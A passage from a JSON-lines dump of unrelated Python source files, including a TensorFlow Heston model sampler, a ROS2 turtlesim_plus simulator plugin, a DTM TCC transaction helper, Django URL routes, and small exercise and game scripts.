variance.\n epsilon: Scalar real `Tensor` or an instant of batch-free left-continuous\n `PiecewiseConstantFunc`. Should contain positive a value of the same\n `dtype` as `kappa`.\n Corresponds to the volatility of the volatility.\n rho: Scalar real `Tensor` or an instant of batch-free left-continuous\n `PiecewiseConstantFunc`. Should contain a value in range (-1, 1) of the\n same `dtype` as `kappa`.\n Corresponds to the correlation between dW_{X}` and `dW_{V}`.\n dtype: The default dtype to use when converting values to `Tensor`s.\n Default value: `None` which means that default dtypes inferred by\n TensorFlow are used.\n name: Python string. The name to give to the ops created by this class.\n Default value: `None` which maps to the default name `heston_model`.\n \"\"\"\n self._name = name or 'heston_model'\n with tf.compat.v1.name_scope(self._name,\n values=[kappa, theta, epsilon, rho]):\n self._dtype = dtype or None\n self._kappa = kappa if isinstance(\n kappa, piecewise.PiecewiseConstantFunc) else tf.convert_to_tensor(\n kappa, dtype=self._dtype, name='kappa')\n self._theta = theta if isinstance(\n theta, piecewise.PiecewiseConstantFunc) else tf.convert_to_tensor(\n theta, dtype=self._dtype, name='theta')\n self._epsilon = epsilon if isinstance(\n epsilon, piecewise.PiecewiseConstantFunc) else tf.convert_to_tensor(\n epsilon, dtype=self._dtype, name='epsilon')\n self._rho = rho if isinstance(\n rho, piecewise.PiecewiseConstantFunc) else tf.convert_to_tensor(\n rho, dtype=self._dtype, name='rho')\n\n def _vol_fn(t, x):\n \"\"\"Volatility function of the Heston Process.\"\"\"\n # For correlated brownian motions W_{X} and W_{V} with correlation\n # `rho(t)`, one can write\n # W_{V}(t) = rho(t) * W_{X}(t) + sqrt(1 - rho(t)**2) * W_{Z}(t)\n # where W_{Z}(t) is an independent from W_{X} and W{V} Brownian motion\n # Volatility matrix for Heston model is then\n # [[sqrt(V(t)), 0],\n # [epsilon(t) * rho(t) * sqrt(V(t)), epsilon(t) * sqrt(1-rho**2) * V(t)]]\n vol = tf.sqrt(tf.abs(x[..., 1]))\n zeros = tf.zeros_like(vol)\n # Get parameter values at time `t`\n rho, epsilon = _get_parameters([t], self._rho, self._epsilon) # pylint: disable=unbalanced-tuple-unpacking\n rho, epsilon = rho[0], epsilon[0]\n # First column of the volatility matrix\n vol_matrix_1 = tf.stack([vol, epsilon * rho * vol], -1)\n # Second column of the volatility matrix\n vol_matrix_2 = tf.stack([zeros, epsilon * tf.sqrt(1 - rho**2) * vol], -1)\n vol_matrix = tf.stack([vol_matrix_1, vol_matrix_2], -1)\n return vol_matrix\n\n def _drift_fn(t, x):\n var = x[..., 1]\n # Get parameter values at time `t`\n kappa, theta = _get_parameters([t], self._kappa, self._theta) # pylint: disable=unbalanced-tuple-unpacking\n kappa, theta = kappa[0], theta[0]\n log_spot_drift = -var / 2\n var_drift = kappa * (theta - var)\n drift = tf.stack([log_spot_drift, var_drift], -1)\n return drift\n\n super(HestonModel, self).__init__(2, _drift_fn, _vol_fn, dtype, name)\n\n def sample_paths(self,\n times,\n initial_state,\n num_samples=1,\n random_type=None,\n seed=None,\n time_step=None,\n skip=0,\n tolerance=1e-6,\n name=None):\n \"\"\"Returns a sample of paths from the process.\n\n Using Quadratic-Exponential (QE) method described in [1] generates samples\n paths started at time zero and returns paths values at the specified time\n points.\n\n Args:\n times: Rank 1 `Tensor` of positive real values. The times at which the\n path points are to be evaluated.\n initial_state: A rank 1 `Tensor` with two elements where the first element\n corresponds to the initial value of the log spot `X(0)` and the second\n to the starting variance value `V(0)`.\n num_samples: Positive scalar `int`. The number of paths to draw.\n random_type: Enum value of `RandomType`. The type of (quasi)-random\n number generator to use to generate the paths.\n Default value: None which maps to the standard pseudo-random numbers.\n seed: Seed for the random number generator. The seed is\n only relevant if `random_type` is one of\n `[STATELESS, PSEUDO, HALTON_RANDOMIZED, PSEUDO_ANTITHETIC,\n STATELESS_ANTITHETIC]`. For `PSEUDO`, `PSEUDO_ANTITHETIC` and\n `HALTON_RANDOMIZED` the seed should be an Python integer. For\n `STATELESS` and `STATELESS_ANTITHETIC `must be supplied as an integer\n `Tensor` of shape `[2]`.\n Default value: `None` which means no seed is set.\n time_step: Positive Python float to denote time discretization parameter.\n skip: `int32` 0-d `Tensor`. The number of initial points of the Sobol or\n Halton sequence to skip. Used only when `random_type` is 'SOBOL',\n 'HALTON', or 'HALTON_RANDOMIZED', otherwise ignored.\n tolerance: Scalar positive real `Tensor`. Specifies minimum time tolerance\n for which the stochastic process `X(t) != X(t + tolerance)`.\n Default value: 1e-6.\n name: Str. The name to give this op.\n Default value: `sample_paths`.\n\n Returns:\n A `Tensor`s of shape [num_samples, k, 2] where `k` is the size\n of the `times`. For each sample and time the first dimension represents\n the simulated log-state trajectories of the spot price `X(t)`, whereas the\n second one represents the simulated variance trajectories `V(t)`.\n\n Raises:\n ValueError: If `time_step` is not supplied.\n\n #### References:\n [1]: Leif Andersen. Efficient Simulation of the Heston Stochastic\n Volatility Models. 2006.\n \"\"\"\n if random_type is None:\n random_type = random.RandomType.PSEUDO\n if time_step is None:\n raise ValueError('`time_step` can not be `None` when calling '\n 'sample_paths of HestonModel.')\n # Note: all the notations below are the same as in [1].\n name = name or (self._name + '_sample_path')\n with tf.name_scope(name):\n time_step = tf.convert_to_tensor(time_step, self._dtype)\n times = tf.convert_to_tensor(times, self._dtype)\n current_log_spot = (\n tf.convert_to_tensor(initial_state[..., 0], dtype=self._dtype)\n + tf.zeros([num_samples], dtype=self._dtype))\n current_vol = (\n tf.convert_to_tensor(initial_state[..., 1], dtype=self._dtype)\n + tf.zeros([num_samples], dtype=self._dtype))\n num_requested_times = times.shape[0]\n times, keep_mask = _prepare_grid(\n times, time_step, times.dtype,\n self._kappa, self._theta, self._epsilon, self._rho)\n return self._sample_paths(\n times, num_requested_times,\n current_log_spot, current_vol,\n num_samples, random_type, keep_mask, seed, skip, tolerance)\n\n def _sample_paths(self,\n times,\n num_requested_times,\n current_log_spot,\n current_vol,\n num_samples,\n random_type,\n keep_mask,\n seed,\n skip,\n tolerance):\n \"\"\"Returns a sample of paths from the process.\"\"\"\n # Note: all the notations below are the same as in [1].\n dt = times[1:] - times[:-1]\n # Compute the parameters at `times`. Here + tf.reduce_min(dt) / 2 ensures\n # that the value is constant between `times`.\n kappa, theta, epsilon, rho = _get_parameters( # pylint: disable=unbalanced-tuple-unpacking\n times + tf.reduce_min(dt) / 2,\n self._kappa, self._theta, self._epsilon, self._rho)\n # In order random_type which is not PSEUDO, sequence of independent random\n # normals should be generated upfront.\n if dt.shape.is_fully_defined():\n steps_num = dt.shape.as_list()[-1]\n else:\n steps_num = tf.shape(dt)[-1]\n # TODO(b/148133811): Re-enable Sobol test when TF 2.2 is released.\n if random_type == random.RandomType.SOBOL:\n raise ValueError('Sobol sequence for Euler sampling is temporarily '\n 'unsupported when `time_step` or `times` have a '\n 'non-constant value')\n if random_type != random.RandomType.PSEUDO:\n # Note that at each iteration we need 2 random draws.\n normal_draws = utils.generate_mc_normal_draws(\n num_normal_draws=2, num_time_steps=steps_num,\n num_sample_paths=num_samples, random_type=random_type,\n seed=seed,\n dtype=self.dtype(), skip=skip)\n else:\n normal_draws = None\n cond_fn = lambda i, *args: i < steps_num\n def body_fn(i, written_count, current_vol, current_log_spot, vol_paths,\n log_spot_paths):\n \"\"\"Simulate Heston process to the next time point.\"\"\"\n time_step = dt[i]\n if normal_draws is None:\n normals = random.mv_normal_sample(\n (num_samples,),\n mean=tf.zeros([2], dtype=kappa.dtype), seed=seed)\n else:\n normals = normal_draws[i]\n def _next_vol_fn():\n return _update_variance(\n kappa[i], theta[i], epsilon[i], rho[i],\n current_vol, time_step, normals[..., 0])\n # Do not update variance if `time_step > tolerance`\n next_vol = tf.cond(time_step > tolerance,\n _next_vol_fn,\n lambda: current_vol)\n def _next_log_spot_fn():\n return _update_log_spot(\n kappa[i], theta[i], epsilon[i], rho[i],\n current_vol, next_vol, current_log_spot, time_step,\n normals[..., 1])\n # Do not update state if `time_step > tolerance`\n next_log_spot = tf.cond(time_step > tolerance,\n _next_log_spot_fn,\n lambda: current_log_spot)\n # Update volatility paths\n vol_paths = utils.maybe_update_along_axis(\n tensor=vol_paths,\n do_update=keep_mask[i + 1],\n ind=written_count,\n axis=1,\n new_tensor=tf.expand_dims(next_vol, axis=1))\n # Update log-spot paths\n log_spot_paths = utils.maybe_update_along_axis(\n tensor=log_spot_paths,\n do_update=keep_mask[i + 1],\n ind=written_count,\n axis=1,\n new_tensor=tf.expand_dims(next_log_spot, axis=1))\n written_count += tf.cast(keep_mask[i + 1], dtype=tf.int32)\n return (i + 1, written_count,\n next_vol, next_log_spot, vol_paths, log_spot_paths)\n\n shape = (num_samples, num_requested_times)\n log_spot_paths = tf.zeros(shape, dtype=self._dtype)\n vol_paths = tf.zeros(shape, dtype=self._dtype)\n _, _, _, _, vol_paths, log_spot_paths = tf.while_loop(\n cond_fn, body_fn, (0, 0, current_vol, current_log_spot,\n vol_paths, log_spot_paths),\n maximum_iterations=steps_num)\n return tf.stack([log_spot_paths, vol_paths], -1)\n\n\ndef _get_parameters(times, *params):\n \"\"\"Gets parameter values at at specified `times`.\"\"\"\n result = []\n for param in params:\n if isinstance(param, piecewise.PiecewiseConstantFunc):\n result.append(param(times))\n else:\n result.append(param * tf.ones_like(times))\n return result\n\n\ndef _update_variance(\n kappa, theta, epsilon, rho,\n current_vol, time_step, normals, psi_c=1.5):\n \"\"\"Updates variance value.\"\"\"\n del rho\n psi_c = tf.convert_to_tensor(psi_c, dtype=kappa.dtype)\n scaled_time = tf.exp(-kappa * time_step)\n epsilon_squared = epsilon**2\n m = theta + (current_vol - theta) * scaled_time\n s_squared = (\n current_vol * epsilon_squared * scaled_time / kappa\n * (1 - scaled_time) + theta * epsilon_squared / 2 / kappa\n * (1 - scaled_time)**2)\n psi = s_squared / m**2\n uniforms = 0.5 * (1 + tf.math.erf(normals / _SQRT_2))\n cond = psi < psi_c\n # Result where `cond` is true\n psi_inv = 2 / psi\n b_squared = psi_inv - 1 + tf.sqrt(psi_inv * (psi_inv - 1))\n\n a = m / (1 + b_squared)\n next_var_true = a * (tf.sqrt(b_squared) + tf.squeeze(normals))**2\n # Result where `cond` is false\n p = (psi - 1) / (psi + 1)\n beta = (1 - p) / m\n next_var_false = tf.where(uniforms > p,\n tf.math.log(1 - p) - tf.math.log(1 - uniforms),\n tf.zeros_like(uniforms)) / beta\n next_var = tf.where(cond, next_var_true, next_var_false)\n return next_var\n\n\ndef _update_log_spot(\n kappa, theta, epsilon, rho,\n current_vol, next_vol, current_log_spot, time_step, normals,\n gamma_1=0.5, gamma_2=0.5):\n \"\"\"Updates log-spot value.\"\"\"\n k_0 = - rho * kappa * theta / epsilon * time_step\n k_1 = (gamma_1 * time_step\n * (kappa * rho / epsilon - 0.5)\n - rho / epsilon)\n k_2 = (gamma_2 * time_step\n * (kappa * rho / epsilon - 0.5)\n + rho / epsilon)\n k_3 = gamma_1 * time_step * (1 - rho**2)\n k_4 = gamma_2 * time_step * (1 - rho**2)\n\n next_log_spot = (\n current_log_spot + k_0 + k_1 * current_vol + k_2 * next_vol\n + tf.sqrt(k_3 * current_vol + k_4 * next_vol) * normals)\n return next_log_spot\n\n\ndef _prepare_grid(times, time_step, dtype, *params):\n \"\"\"Prepares grid of times for path generation.\n\n Args:\n times: Rank 1 `Tensor` of increasing positive real values. The times at\n which the path points are to be evaluated.\n time_step: Rank 0 real `Tensor`. Maximal distance between points in\n resulting grid.\n dtype: `tf.Dtype` of the input and output `Tensor`s.\n *params: Parameters of the Heston model. Either scalar `Tensor`s of the\n same `dtype` or instances of `PiecewiseConstantFunc`.\n\n Returns:\n Tuple `(all_times, mask)`.\n `all_times` is a 1-D real `Tensor` containing all points from 'times`, the\n uniform grid of points between `[0, times[-1]]` with grid size equal to\n `time_step`, and jump locations of piecewise constant parameters The\n `Tensor` is sorted in ascending order and may contain duplicates.\n `mask` is a boolean 1-D `Tensor` of the same shape as 'all_times', showing\n which elements of 'all_times' correspond to THE values from `times`.\n Guarantees that times[0]=0 and mask[0]=False.\n \"\"\"\n grid = tf.range(0.0, times[-1], time_step, dtype=dtype)\n additional_times = []\n for param in params:\n if isinstance(param, piecewise.PiecewiseConstantFunc):\n additional_times.append(param.jump_locations())\n all_times = tf.concat([grid, times] + additional_times, axis=0)\n additional_times_mask = [\n tf.zeros_like(times, dtype=tf.bool) for times in additional_times]\n mask = tf.concat([\n tf.zeros_like(grid, dtype=tf.bool),\n tf.ones_like(times, dtype=tf.bool)\n ] + additional_times_mask, axis=0)\n perm = tf.argsort(all_times, stable=True)\n all_times = tf.gather(all_times, perm)\n mask = tf.gather(mask, perm)\n return all_times, mask\n","repo_name":"WorldCapital/tf-quant-finance","sub_path":"tf_quant_finance/models/heston/heston_model.py","file_name":"heston_model.py","file_ext":"py","file_size_in_byte":18130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73730257449","text":"import random\r\nfrom Bomb import *\r\nclass House(object):\r\n\r\n def __init__(self):\r\n \"\"\"creates a house in a random location\"\"\"\r\n self.x = random.randint(0, 590)\r\n self.y = random.randint(0, 590)\r\n self.size = 10\r\n self.home = Rectangle(Point(self.x, self.y),\r\n Point(self.x + self.size, self.y + self.size))\r\n self.home.setFill(\"Black\")\r\n\r\n def drawHouse(self, win:GraphWin):\r\n self.home.draw(win)\r\n\r\n def getDistance(self, bombCenter:Point):\r\n houseCenter = self.home.getCenter()\r\n dx = (houseCenter.getX() - bombCenter.getX())**2\r\n dy = (houseCenter.getY() - bombCenter.getY())**2\r\n return (dx + dy)**0.5\r\n\r\n def isHit(self, bomb:Bomb):\r\n if self.getDistance(bomb.center) < bomb.radius:\r\n self.home.setFill(\"red\")\r\n\r\n","repo_name":"PSHS-Programming1/Period4GitTest","sub_path":"House.py","file_name":"House.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15037297759","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n # Other URL patterns...\n path('register/', views.register, name='register'),\n path('login/', views.login_user, name='login'),\n path('logout/', views.logout_user, name='logout'),\n # You can add more URLs as needed\n]\n","repo_name":"wcantu/DevWebsiteDjango","sub_path":"PlaynTrade/loginpage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37067397077","text":"# 상하좌우\n\nN = int(input())\nlst = list(map(str, input().split()))\n\nstart = [1,1]\n\nfor i in range(len(lst)):\n if lst[i] == 'L' :\n if start[1] -1 == 0:\n continue\n start[1] -= 1\n elif lst[i] == 'R' :\n if start[1] +1 == N:\n continue\n start[1] += 1\n elif lst[i] == 'U' :\n if start[0] -1 == 0:\n continue\n start[0] -= 1\n elif lst[i] == 'D' :\n if start[0] + 1 == N:\n continue\n start[0] += 1\n else:\n continue\n\nprint(start)","repo_name":"junh0328/prepare_algorithm","sub_path":"implementation/implementation01-1.py","file_name":"implementation01-1.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5163585505","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @Author : Stone\n# Date : 2022/3/31\nimport inspect\n\nfrom .imp.const import OpCancel, OpConfirm, OpTry\nfrom .imp.trans_base import TransBase, trans_register_branch, trans_request_branch, trans_call_dtm\n\n\ndef tcc_global_transaction(dtm: str, gid: str, tcc_func):\n return tcc_global_transaction2(dtm, gid, my_custom, tcc_func)\n\n\nasync def tcc_global_transaction2(dtm: str, gid: str, custom, tcc_func):\n tcc = Tcc(gid=gid, trans_type=\"tcc\", dtm=dtm, branch_id=\"\")\n try:\n _ = await custom(tcc) if inspect.iscoroutinefunction(custom) else custom(tcc)\n res = await trans_call_dtm(tcc, tcc, \"prepare\")\n if res:\n return res\n\n resp, err = await tcc_func(tcc) if inspect.iscoroutinefunction(tcc_func) else tcc_func(tcc)\n _ = await trans_call_dtm(tcc, tcc, \"abort\") if err else await trans_call_dtm(tcc, tcc, \"submit\")\n\n except Exception as e:\n await trans_call_dtm(tcc, tcc, \"abort\")\n raise e\n return\n\n\nclass Tcc(TransBase):\n\n def __init__(self,**kwargs):\n \"\"\"\n\n :param orders:\n \"\"\"\n kwargs.update(trans_type=\"tcc\")\n super(Tcc, self).__init__(**kwargs)\n\n async def call_branch(self, body: dict, try_url: str, confirm_url: str, cancel_url: str):\n branch_id = self.new_sub_branch_id()\n added = {\n \"data\": body,\n \"branch_id\": branch_id,\n OpConfirm: confirm_url,\n OpCancel: cancel_url,\n }\n error = await trans_register_branch(self, added, operation=\"registerBranch\")\n if not error:\n return None, error\n return await trans_request_branch(self, \"POST\", body, branch_id, OpTry, try_url)\n\n\nasync def my_custom(t: Tcc):\n ...\n","repo_name":"tufbel/PythonTools","sub_path":"src/my_tools/dtm_tools/tcc.py","file_name":"tcc.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15038596959","text":"#!/usr/bin/python3\n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n# The GPL3 license is a widely used free software license that allows \n# users to run, study, share, and modify software. It requires that \n# any derivative works or modifications made to the software be \n# licensed under the GPL3 and that the source code be made available \n# to anyone who receives the software.\n\n\n# other libraries\nimport os\nimport random\nimport abc\nfrom typing import Dict\nimport pygame\n\n# package module\nfrom turtlesim_plus.entity import (\n Entity, Pizza, Turtle, \n TurtleCommandInterface,TurtleScannerInterface,TurtleEatInterface, \n Simulator\n)\n\n# RCLPY libraries, classes, functions\nfrom rclpy.node import Node\nfrom rclpy.action import ActionServer\nfrom rclpy.action.server import ServerGoalHandle\n\n# ROS Packages\nfrom std_msgs.msg import Int64\nfrom std_srvs.srv import Empty\nfrom turtlesim.msg import Pose\nfrom turtlesim.srv import Spawn, Kill\nfrom geometry_msgs.msg import Twist, Point\nfrom turtlesim_plus_interfaces.msg import ScannerData, ScannerDataArray\nfrom turtlesim_plus_interfaces.srv import GivePosition\nfrom turtlesim_plus_interfaces.action import GetData\n\nclass ROS2Plugin(abc.ABC):\n def __init__(self,node:Node):\n self.node = node\nclass MouseROS2Plugin(ROS2Plugin):\n def __init__(self,node:Node):\n super().__init__(node=node)\n self.mouse_pub = self.node.create_publisher(Point,'mouse_position',10)\n self.node.simulator.mouse_callback = self.mouse_callback\n def mouse_callback(self,pos):\n msg = Point()\n msg.x = pos[0]*5.44/250\n msg.y = 10.88-pos[1]*5.44/250\n self.mouse_pub.publish(msg)\nclass TurtleCommandROS2Plugin(TurtleCommandInterface,ROS2Plugin):\n def __init__(self, turtle: Turtle,node: Node,image):\n TurtleCommandInterface.__init__(self,turtle=turtle)\n ROS2Plugin.__init__(self,node=node)\n self.cmd_vel_pub = self.node.create_publisher(Pose,self.turtle.name+'/pose',10)\n self.sub = self.node.create_subscription(Twist,self.turtle.name+'/cmd_vel',self.cmd_vel_sub_callback,10)\n self.stop_service = self.node.create_service(Empty,self.turtle.name+'/stop',self.stop_srv_callback)\n self.image = image\n def cmd_vel_sub_callback(self,msg:Twist):\n self.command_velocity = [msg.linear.x,msg.angular.z]\n def stop_srv_callback(self,request:Empty.Request,response:Empty.Response):\n self.command_velocity = [0.0,0.0]\n return response\n def update(self, dt: float = 0.1, *args, **kwargs):\n TurtleCommandInterface.update(self, dt, *args, **kwargs)\n self.set_state(self.turtle.state)\n self.set_pose(self.turtle.state)\n msg = Pose()\n msg.x = self.state[0]\n msg.y = self.state[1]\n msg.theta = self.state[2]\n #qw = np.cos(yaw/2) \n #qz = np.sin(yaw/2) \n self.cmd_vel_pub.publish(msg=msg)\n def __del__(self):\n self.node.destroy_publisher(publisher=self.cmd_vel_pub)\n self.node.destroy_subscription(subscription=self.sub)\n self.node.destroy_service(service=self.stop_service)\nclass TurtleScannerROS2Plugin(TurtleScannerInterface,ROS2Plugin):\n def __init__(self, turtle:Turtle,node:Node):\n TurtleScannerInterface.__init__(self,turtle=turtle)\n ROS2Plugin.__init__(self,node=node)\n self.scanner_pub = self.node.create_publisher(ScannerDataArray,self.turtle.name+'/scan',10)\n self.action_server = ActionServer(self.node,GetData,self.turtle.name+'/detect_pizza',self.execute_callback)\n def execute_callback(self,goal_handle:ServerGoalHandle):\n result = GetData.Result()\n if len(self.scanner_output)>0:\n result.is_data = True\n msg = ScannerDataArray()\n for data in self.scanner_output:\n scanner_data = ScannerData()\n if str(data.type.__name__)=='Pizza':\n scanner_data.type = 'Pizza'\n scanner_data.angle = data.angle\n scanner_data.distance = data.distance\n msg.data.append(scanner_data)\n result.data = msg\n goal_handle.succeed()\n else:\n result.is_data = False\n goal_handle.abort()\n return result\n def update(self, dt: float = 0.1, entity_list:Dict[str,Entity] = {}, *args, **kwargs):\n TurtleScannerInterface.update(self,dt=dt,entity_list=entity_list)\n self.set_state(self.turtle.state)\n if len(self.scanner_output)>0:\n msg = ScannerDataArray()\n for data in self.scanner_output:\n scanner_data = ScannerData()\n if str(data.type.__name__).startswith('Turtle'):\n scanner_data.type = 'Turtle'\n else:\n scanner_data.type = data.type.__name__\n scanner_data.angle = data.angle\n scanner_data.distance = data.distance\n msg.data.append(scanner_data)\n self.scanner_pub.publish(msg)\n def __del__(self):\n self.node.destroy_publisher(publisher=self.scanner_pub)\nclass TurtleEatROS2Plugin(TurtleEatInterface,ROS2Plugin):\n def __init__(self, turtle:Turtle,node:Node):\n TurtleEatInterface.__init__(self,turtle=turtle)\n ROS2Plugin.__init__(self,node=node)\n self.pizza_count = 0\n self.pizza_count_publisher = self.node.create_publisher(Int64,self.turtle.name+'/pizza_count',10)\n self.eat_service = self.node.create_service(Empty,self.turtle.name+'/eat',self.eat_srv_callback)\n def eat_srv_callback(self,request:Empty.Request,response:Empty.Response):\n if len(self.edibles)>0:\n self.pizza_count+=1\n edible = self.edibles.pop(0)\n del self.node.simulator.entity_list[edible.name]\n del self.node.simulator.gui.entity_list[edible.name]\n return response\n def update(self, dt: float = 0.1, entity_list:Dict[str,Entity] = {}, *args, **kwargs):\n TurtleEatInterface.update(self,dt=dt,entity_list=entity_list)\n self.set_state(self.turtle.state)\n msg = Int64()\n msg.data = self.pizza_count\n self.pizza_count_publisher.publish(msg)\n def __del__(self):\n self.node.destroy_publisher(publisher=self.pizza_count_publisher)\n self.node.destroy_service(service=self.eat_service)\n\nclass TurtleCommandScannerEatROS2Plugin(TurtleScannerROS2Plugin,TurtleCommandROS2Plugin,TurtleEatROS2Plugin):\n def __init__(self, turtle: Turtle, node: Node, image):\n TurtleCommandROS2Plugin.__init__(self,turtle=turtle, node=node, image=image)\n TurtleScannerROS2Plugin.__init__(self,turtle=turtle,node=node)\n TurtleEatROS2Plugin.__init__(self,turtle=turtle,node=node)\n def update(self, dt: float = 0.1, entity_list: Dict[str,Entity] = {}, *args, **kwargs):\n TurtleCommandROS2Plugin.update(self,dt=dt)\n TurtleScannerROS2Plugin.update(self,dt=dt,entity_list=entity_list)\n TurtleEatROS2Plugin.update(self,dt=dt,entity_list=entity_list)\n def render(self, screen):\n TurtleScannerROS2Plugin.render(self,screen=screen)\n TurtleEatROS2Plugin.render(self,screen=screen)\n TurtleCommandROS2Plugin.render(self,screen=screen)\n def __del__(self):\n TurtleEatROS2Plugin.__del__(self)\n TurtleScannerROS2Plugin.__del__(self)\n TurtleCommandROS2Plugin.__del__(self)\nclass TurtlesimPlusNode(Node):\n def __init__(self):\n super().__init__(node_name='turtlesim_plus')\n time_step = 0.01 \n self.simulator = Simulator(time_step=time_step)\n self.mouse_plugin = MouseROS2Plugin(self)\n self.create_timer(time_step,self.timer_callback)\n self.spawn_turtle_service = self.create_service(Spawn,'spawn_turtle',self.spawn_turtle_srv_callback)\n self.remove_turtle_service = self.create_service(Kill,'remove_turtle',self.remove_turtle_srv_callback)\n self.spawn_pizza_service = self.create_service(GivePosition,'spawn_pizza',self.spawn_pizza_srv_callback)\n prompt = \"\"\"\n \n Welcome to Turtlesim+!!\n\n You can call the following services to interact with 'the simulator':\n /spawn_turtle,/remove_turtle,/spawn_pizza\n\n \"Once you spawn at least 1 turtle, you can read from the following topics:\n /[name]/pose,/[name]/scan,/[name]/pizza_count\n\n You can also publish to '/[name]/cmd_vel'.\n\n You can also call the following turtle's services.\n /[name]/eat,/[name]/stop\n\n \"\"\"\n self.get_logger().info(prompt)\n \n request = Spawn.Request()\n request.name = 'turtle1'\n response = Spawn.Response()\n self.spawn_turtle_srv_callback(request,response)\n \n \n def spawn_turtle_srv_callback(self,request:Spawn.Request,response:Spawn.Response):\n flag = False\n init_pose = [5.44,5.44,0.0]\n if not request.name:\n name = 'turtle1'\n flag = True\n else:\n name = request.name\n idx = 0\n while name in self.simulator.entity_list.keys():\n idx += 1\n name = 'turtle'+str(idx)\n if flag:\n self.get_logger().info(f'Name is not given. Use {name} instead.')\n if idx >0:\n self.get_logger().info(f'The name {request.name} already exists in Turtlesim Plus. Use {name} instead.')\n if request.x:\n x = request.x\n else:\n x = init_pose[0]\n if request.y:\n y = request.y\n else:\n y = init_pose[1]\n if request.theta:\n theta = request.theta\n else:\n theta = init_pose[2]\n \n image = random.choice(self.simulator.gui.available_images)\n self.simulator.gui.available_images.remove(image) \n turtle = Turtle(name=name,init_pose=[x,y,theta])\n # load graphics when added\n graphics = pygame.image.load(os.path.join(self.simulator.gui.image_dir,'turtle',image)).convert_alpha()\n turtle.set_graphics(graphics=graphics)\n ros2_turtle = TurtleCommandScannerEatROS2Plugin(turtle=turtle,node=self,image=image)\n self.simulator.add_entity(entity=ros2_turtle)\n response.name = name\n return response\n def remove_turtle_srv_callback(self,request:Kill.Request,response:Kill.Response):\n if not request.name:\n self.get_logger().warning('No name is given. No turtle is removed.')\n else:\n if request.name in self.simulator.entity_list.keys():\n entity = self.simulator.entity_list[request.name]\n if isinstance(entity,TurtleCommandScannerEatROS2Plugin):\n self.simulator.remove_entity(entity=entity)\n self.simulator.engine.remove_entity(entity=entity)\n self.simulator.gui.available_images.append(entity.image)\n entity.__del__()\n self.get_logger().warning(f'Successfully remove {request.name}')\n else:\n self.get_logger().warning(f'No turtle with the name {request.name}')\n return response\n def spawn_pizza_srv_callback(self,request:GivePosition.Request,response:GivePosition.Response):\n idx = 0\n name = 'pizza0'+str(idx)\n while name in self.simulator.entity_list.keys():\n idx += 1\n name = 'pizza'+str(idx)\n if not request.x:\n x = random.uniform(0,10.88)\n else:\n x = request.x\n if not request.y:\n y = random.uniform(0,10.88)\n else:\n y = request.y\n # load graphics when added\n graphics = pygame.image.load(os.path.join(self.simulator.gui.image_dir,'object','pizza.png')).convert_alpha()\n pizza = Pizza(name=name,pose=[x,y,0.0])\n pizza.set_graphics(graphics=graphics)\n self.simulator.add_entity(entity=pizza)\n return response\n \n def timer_callback(self):\n self.simulator.step()\n","repo_name":"tchoopojcharoen/turtlesim_plus","sub_path":"turtlesim_plus/turtlesim_plus/ros2_plugins.py","file_name":"ros2_plugins.py","file_ext":"py","file_size_in_byte":12584,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"71191401127","text":"import numpy as np\n\nrandom_list = np.random.uniform(-1000, 1000, 100)\n\nMenores = [0,0]\nMayores = [0,0]\n\nfor x in random_list:\n if(x < Menores[0]):\n Menores[1] = Menores[0]\n Menores[0] = x\n if(x > Mayores[0]):\n Mayores[1] = Mayores[0]\n Mayores[0] = x\n\nprint(\"\\nLos Menores: \" + str(Menores) + \"\\nLos Mayores: \" + str(Mayores))","repo_name":"MarcoOrtegaF/Genetic","sub_path":"P1.py","file_name":"P1.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24165766958","text":"from turtle import Turtle\nimport random\n\n\nclass Food(Turtle):\n\n def __init__(self):\n super().__init__()\n self.shape(\"turtle\")\n self.penup()\n self.shapesize(stretch_len=0.5, stretch_wid=0.6)\n self.color(\"green\")\n self.speed(\"fastest\")\n self.refresh()\n\n def refresh(self):\n random_x = random.randint(-260, 260)\n random_y = random.randint(-260, 260)\n self.goto(random_x, random_y)\n\n\n# shapesize() = provides the attributes for shape of the turtle to be.\n# distance() = To show how much distance to set from something\n","repo_name":"SureshRajJoshi/snake-game","sub_path":"food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13541999279","text":"from mockbuild.trace_decorator import decorate, traceLog, getLog\n\nimport mockbuild.util\nimport shutil\nimport os\nimport os.path\nimport glob\n\nrequires_api_version = \"1.0\"\n\n# plugin entry point\ndecorate(traceLog())\ndef init(root, opts):\n O0g3(root, opts)\n\nclass O0g3(object):\n \"\"\"Source mount dirs from host into chroot\"\"\"\n\n\n decorate(traceLog())\n def __init__(self, root, opts):\n self.root = root\n self.opts = opts\n self.O0g3s = {\n \"gcc\": \"/usr/share/mock-O0g3-plugin/gcc-O0g3\",\n \"cc\": \"/usr/share/mock-O0g3-plugin/cc-O0g3\",\n \"g++\": \"/usr/share/mock-O0g3-plugin/g++-O0g3\",\n \"c++\": \"/usr/share/mock-O0g3-plugin/c++-O0g3\",\n \"strip\": 